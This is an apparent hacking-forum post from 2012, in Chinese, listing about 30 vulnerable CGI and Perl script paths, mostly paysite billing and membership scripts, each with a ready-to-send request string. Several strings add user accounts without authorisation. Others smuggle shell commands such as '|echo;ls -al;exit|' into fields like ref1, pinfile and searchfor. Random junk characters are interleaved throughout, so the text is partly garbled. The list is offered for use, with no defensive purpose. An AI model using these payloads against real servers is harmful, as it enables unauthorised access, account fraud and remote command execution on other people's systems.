找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2578|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
6 f8 @) `# [, A2 s8 N5 [; E1 d$ T
/smspass.pl7 b/ N% q2 O0 m+ V) R) O9 G1 w
username=username&password=password
$ E8 w  Q5 c3 q9 q, S0 h- I0 @; s- r5 c- \$ f, c  r8 f- |
/index.cgi
' O) X$ N, N/ _  l. d' fwei=ren&gen=command
! ]4 a7 h' i' ^5 l2 Q- @/ ~; Y: T5 N" H7 G
/passmaster.cgi1 t5 f0 N. x5 e  T3 R
Action=Add&Username=Username&Password=Password. P+ Z4 D: h9 W' E/ Y% l
9 n) p6 L2 H7 I+ ?
/accountcreate.cgi
* W! U" P3 C$ O+ g7 u: `* D8 L2 [username=username&password=password&ref1=|echo;ls|6 N: d9 i4 S/ k( L) p/ e  @

+ c5 ?' M. i. Q/form.cgi! W1 n% R/ ]: z
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
: }% y7 P# b( v# V1 v+ j/ X4 F% i" k; m5 q& C5 |- n: |/ N, @& C
/addusr.pl% f; c4 y  ?4 N- j1 |7 \  P
/cgi-bin/EuroDebit/addusr.pl3 N8 B2 ^* c2 q3 O" c& ?/ w
user=username&pass=Password&confirm=Password5 _! ?: a( f& c/ x( S
0 H6 P7 [& E2 V% o2 A) S
/ccbill-local.asp4 J; k& k( D: N" m- L1 ]( O
post_values=username:password
2 p. b8 ?, _1 u
4 z7 N- b  H% \( ^/count.cgi
! v8 W6 F: w! \' z& \. Wpinfile=|echo;ls -la;exit|
8 x; k, R+ p' r1 ^/ W3 U+ n- _
/ g6 F4 A1 K0 ~- g4 R/recon.cgi
0 y6 H; C7 c" d5 a/recon.cgi?search
2 L, D& O9 P5 |2 C, b% Gsearchoption=1&searchfor=|echo;ls -al;exit|
3 y+ Z& s* M/ x2 t  q4 t5 g3 {! C5 }, l+ O
/verotelrum.pl7 k2 T: P; t9 [& Z9 I
vercode=username:password:dseegsow:add:amount<&30>
+ ^; a) U$ f$ Z7 I+ u7 S$ u# Z
/af.cgi
6 ~5 B0 C4 B6 o_browser_out=|echo;ls -la;exit;|
, z3 [& M4 S& z/ ]" @1 H) s- m
6 b# F4 w0 i; `/modify.cgi( M, X8 R% j4 s% t8 i1 J9 V' y+ ]
username=username&password=password&expire=30
$ y6 u3 |: ^8 P( {4 L" m9 S; r1 B0 A# c( d9 Q9 ]0 P& J$ ?- M) A
/openjournal.cgi( Y: c( i2 @* p* w5 h) E
edit=1&ct=2&go=|echo;ls -al;exit|3 ]4 L8 R  t# X8 \

5 [: V" q  }0 ^- A' ~. d. F/gx9passwd.cgi  _* t3 t( ^4 r- [  Z7 ]
cmd=ADD&user=username&pass=password
. ~* O) L- J3 p3 c8 |0 |. S& a0 B6 I0 L6 Z
/probecontrol.cgi
0 h) y9 t: L# |2 N( ^command=enable&username=username&password=password2 r& g5 d* G( e2 {" V2 S8 n  Y9 M
# t! C3 H0 ^. E" z* Z- k/ z1 h
/recon.cgi
) W, A* a' S/ ]/ ^0 zsearchoption=3&searchfor=echo;ls -la;exit- W& F) r7 l& n4 c
5 X7 i4 J2 @7 I. Y5 y6 O; {& h
/htadd.pl. V9 ^1 d2 U* D8 Z; {
configfile=|echo; ls -alt; exit3 z6 m& X) I8 O' L/ h

1 W; ?- K, H/ D9 b  x7 P/gx9passwd.cgi: T) i9 l* z+ |
cmd=ADD&user=username&pass=password
; [) T" Y" b/ R4 w( a
+ z& A: G! ~& U) _% @1 m1 c2 B/ibill*.pl6 }  G! h! i, @9 D3 F# |
reqtype=add&authpwd=authpwd&username=username&password=password
& [. p0 [# g8 s$ J/ G+ r9 i' N6 g
/cpay.cgi4 d* C6 X+ X. }2 e( J6 t2 O+ B0 S1 s+ B
command=add_member&username=username(EMAIL)&password=password(DES)
, I# L( v, A1 {( t/ d- Y
; q! G4 D' c5 H, q/globill_ut.cgi8 k1 M# \% C$ D6 x1 N
do=add&username=username&password=password&wpassword=password
4 t, @( o/ m! ]- B$ z
# t2 d: n1 Q8 i/usercontrol.cgi
8 e5 D' [* x- L' [, Wcommand=enable&username=USER&password=PASS/ Z9 q8 B/ g, b% S4 N. y
5 f) D3 k" Z$ D! x: D
/globoSALErum.cgi
# e3 `/ R9 {- A: T& N' d# `" W) L% Taction=ADD&seccode=seccode&login=username&password=password: g  ?( P0 x, f3 a
9 q/ U* t) I# M2 Y9 a
/addusr.pl! h& o% W5 K9 s
user=USER&pass=PASS&confirm=PASS' Y0 ]: C) F8 B& O5 I! b& M0 j
) F- K, r2 z1 P2 n/ {& ?' O
/pincount.cgi+ N& N  _: `7 `! g
/cgi-bin/mastergate/pincount.cgi+ U% w- m2 n6 }$ q' J
pinfile=|echo;pwd;exit|
/ l) b! e) _6 Y$ b8 [7 b0 ~
3 m2 D% d" B" P5 \, L, C/accountcreate.cgi( H8 Y% [* Y' q- N7 U
/cgi-bin/gateway/accountcreate.cgi
; |. ?# T# W8 D9 m! Susername=username&password=password&password2=password&ref1=|echo;ls -al;exit, D7 t# m. {! v, V% n4 R( [* w1 {

* c7 X5 {  Z# a' `, Z/af.cgi8 G1 i$ u* J# Y$ }! e% {
/env.cgi: S$ }3 q2 F9 m# r6 w
ADD+;echo;pwd;exit* M: {" r( ]. K& Q5 G5 H/ ]9 R: f
# T! S: _: j8 ~3 Y' L
/count.cgi' q& g6 Z  v2 H$ k3 o) W5 a  Q- y
pinfile=|echo;pwd;exit|$ k. w. s  l+ C, {

8 E3 o+ y- n" n+ g3 m( G: G/recon.cgi/ E' A! q. }! q. F
searchoption=1&searchfor=|echo;ls%20-al;exit|* f. s3 F6 I5 M' I1 ]
! n$ ~. M. C1 {# i
/add.cgi
* R0 [) {3 J0 j3 o4 |9 busername=username&password=password&expire=304 L9 Y) `- b! C% ]
  s9 E9 V, S% B# {- F1 C
==============================' W$ {9 Z9 l+ w) a  m4 d/ V5 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表